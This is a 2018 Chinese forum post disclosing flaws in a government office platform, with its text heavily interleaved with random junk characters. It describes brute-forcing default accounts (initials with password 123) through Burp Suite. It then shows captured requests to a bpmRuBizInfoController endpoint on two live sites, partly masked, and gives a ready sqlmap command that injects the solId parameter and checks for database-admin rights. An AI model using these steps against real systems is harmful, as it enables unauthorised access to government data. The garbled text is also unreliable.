|
8 k" c: P& t, a# H9 y; R
* s. x6 H% }/ @
( _9 p! O/ j& p& L9 t; S" Z! _
8 @: s" O2 k; \+ [
平台简介:1 ]" f G2 x2 n* C; i
/ a( N0 w) C. @' L/ {; c6 H2 h/ {: Y) J* \
0 c' [5 F+ a$ w9 R4 U: Z; G9 c* P
6 Z' E. q+ E0 p/ j' t+ }% m: y
; j8 [3 c/ i3 o0 g4 J
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
! j+ \+ v$ o/ a+ M* d/ ]
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
! _5 _4 p% v1 z0 H
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
6 R E" ?) U9 i. n6 k" U. \% C0 i . N; N3 S3 \* S& b$ v) C
! X' ?. L3 ]& b7 h
8 w2 v4 h4 L) i$ @ o, I( U1 o
4 b# X L; a& T4 `) w. c% K" j0 `
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:! m% N0 ?3 Q$ A) n& L: ~/ {- }
, ] K6 a0 w5 [$ v, {$ s! J. ~, [: @+ i. P0 X S
# I+ D& u& z9 X. e1 ^2 v + x4 V" ]" z, W0 x! v% v+ I
D" F! ^% `( F6 A; Q+ f0 Q% ~
http://1.1.1.1:7197/cap-aco/#(案例2-)
$ Z% C- Q' c% m- a
; o' }* T3 i8 U' q7 p( [6 D1 Q# o0 t1 K% w: n! T* Q
http://www.XXOO.com (案例1-官网网站)
2 Y) J( K; w7 y: |
3 F, J# f2 W0 [! n% \9 Z8 J+ Y
7 N! v/ w: b0 t9 C+ Z* h5 m+ ? + x# G3 k% \% j4 {* \
* w) K) y+ P# J$ d$ F% e
9 O; S, g( d. ]2 O2 Z9 v# d
漏洞详情:
e# |' r5 j" x8 t p. p6 L + R' H. q' ~) {6 ^
1 r J1 w- G1 e* E7 _% f: n7 e
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试6 c* C2 W1 ~; Q# H7 h) w
6 |' ], L3 S, E* i5 Q7 O) k/ M
. Q; @3 [* t$ t! X L8 y 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
. D- k6 Q" `; r) e' u/ [ ' H, q' A6 Z+ b
8 O" P* F+ L& [. q! K; t* o
( m% ^( I6 K: t4 B
% ^& N( B, b& y
/ L7 ~6 | P- l# c) G- Q( @ 
) E' y% _) n q$ M" Y
( T, P- K3 t( C
( r' E2 [+ }8 c* b. \9 \ status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:. o5 m1 L" R* X \. v
) X+ {, K( t/ i. \: _8 p0 Z
0 o: T4 b9 I% i) A 1、案例1-官方网站
2 ~# Y3 Y1 T0 b2 p5 M$ ? 8 _+ \" T9 {( d7 R
( y9 r7 m# W8 K' Y& A7 ?4 J4 } GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.12 y" Q; J1 Z8 `
6 h/ ]& @! p. ^
7 o/ O* q. U7 H2 E- K1 | P8 I Host: www.XXOO.com
$ U3 X* `- x" g' O/ s' k , ?1 X/ ^5 v4 ~" j
8 X5 f2 G' _% K1 p# H2 \
Proxy-Connection: Keep-Alive4 @+ D3 O* E1 a/ ~- E3 q2 |
! B: X$ n6 p; K* V
" q3 b" K5 M0 r6 G6 ] Accept: application/json, text/javascript, */*; q=0.012 B* E5 ]. j/ O3 A
! F/ q. M+ _3 e {" X( k* m1 c% A4 Y) \6 f# [ g9 P5 Y
Accept-Language: zh-CN* y; C' X1 J6 X- n; d% j/ J
3 A. d8 ?0 a. W2 u! y' I1 T( e! C, c5 u# G4 N: n5 @( Y6 l# d6 J
Content-Type: application/json
5 i, d$ s- I2 ]" ~! c " S* ~" i3 |* }; z6 d
+ L# X5 J {& \; u User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
5 S. H* v% c1 u3 E 5 u0 I4 D; U' K1 D
. f6 m, D& G$ J& O7 p
X-Requested-With: XMLHttpRequest
0 r8 Z) z. B1 F* e% l8 z0 B 2 b, H4 T% K9 X1 Q$ G
4 Q' k* k( S, X0 `# t Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002- M( j0 m d0 T0 B, q. V
6 N. b6 C" h$ V- e/ Y" s' O1 _% g& H! q* L6 d! F4 I
Accept-Encoding: gzip, deflate, sdch8 C, G! [& g! |: ~0 K( S
! Z! p3 j0 w, k0 N. u( I
& ?" h ^; ?/ w7 o" b1 f( E/ P: S
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
2 K3 q2 j3 W3 W4 p0 y: N' H
: j3 ]* U8 q+ }
+ V4 K- s- I; F) z 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
1 p+ n2 B6 f9 `8 t s 2 U$ p8 Y- ]0 E3 I
a6 Q5 p$ k1 c' _! d* @# m
 ( @/ [8 y7 _7 l" l
4 h, I) V8 Q* @4 o% M; R; `
* _3 F( j, e" A' k 
- t4 x$ O5 F% z6 T7 e
" ]2 y6 O( C* r4 A5 g2 \6 F& W% L9 g' q, U Y; ^
5 A: A% h3 d( W: x% V
, R4 v7 z# Q) X2 G" {# |( ]1 @, g* v0 Y. `0 l( J/ c" q
: m* F/ D: @' V6 F
" \2 O1 \; y/ U5 m/ ~# u
1 W6 G: Z# a3 A4 f/ C( f
( S" o2 y1 g/ V" Z- A i, |* {
7 [5 Q) z: P! k8 W
w' S) j$ q5 j+ f 2、案例2-某天河云平台
v- }+ P3 U1 ?9 U. z% b
w8 T# @+ P- E" o- K7 O. O% e- Z5 z2 s8 a& Z% u& L3 Y& t- w2 q
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1( _6 ?1 X1 R4 u9 f8 m+ T5 L0 z
* h3 c6 i+ q- @+ Z, N, _; \( V
% N$ [( \( \2 F v/ U Host: 1.1.1.:7197' q7 p$ C( n- z# T3 B
! B2 R/ d3 ?: H2 c& j
8 X' z8 |6 F6 ^; E4 J; C$ z Accept: application/json, text/javascript, */*; q=0.01# e; \) D: F( C
: Y X1 {! {6 a# d
: ~% ]1 q8 X) f$ q# X p X-Requested-With: XMLHttpRequest
) `. B$ v! M, P# K& g* k
. y K H8 B1 p2 _; P! ~2 i+ G/ i1 z6 ]3 Y { ^2 i* A9 r
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0% q2 x( ], i8 s2 S: L5 j5 q
( |1 t2 P# f" w5 R& ]6 u9 d3 I( H) I& ]! |# k) [
Content-Type: application/json
b; ]* i4 o7 M P" P" U1 c 4 ]: N9 [! E% t$ M. [. Y2 ^
: O; H. y1 t6 J( b3 M/ K2 J g! V) B Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
0 f) T) A+ O8 ]3 \/ I/ | 0 a0 b/ c8 U- J, Y/ O3 h
6 | f2 n) Q3 |+ u6 ? L5 a
Accept-Language: zh-CN,zh;q=0.8
- s: B: x5 |% _( m
3 W7 E$ f9 o/ x
2 e; u( I8 w. ~% c' h Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1/ ^, Q6 v- H& J
: J$ p$ }, X( z7 S8 Z
: K7 u! l! n1 N2 d5 S! P9 h2 l/ f% b Connection: close
j8 S! ? x9 E
9 x8 b$ q0 ~1 Z( Y+ o$ z9 R. h, m, Y' i
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:5 h+ L) \( P6 O" P
: |$ |+ u! @/ k# x1 h
( \6 @) a0 ?% E: P" d5 c1 ^' k  ) Z4 W9 N6 Q h# |7 Z) p- p
- t: q/ ?# ?! f; c( k
X% e% S) O4 O. j0 M
" Z$ x5 R, g7 M5 w, R! x1 p4 C! o9 C
| 
发表于 2018-10-20 20:15:17
收藏
支持
反对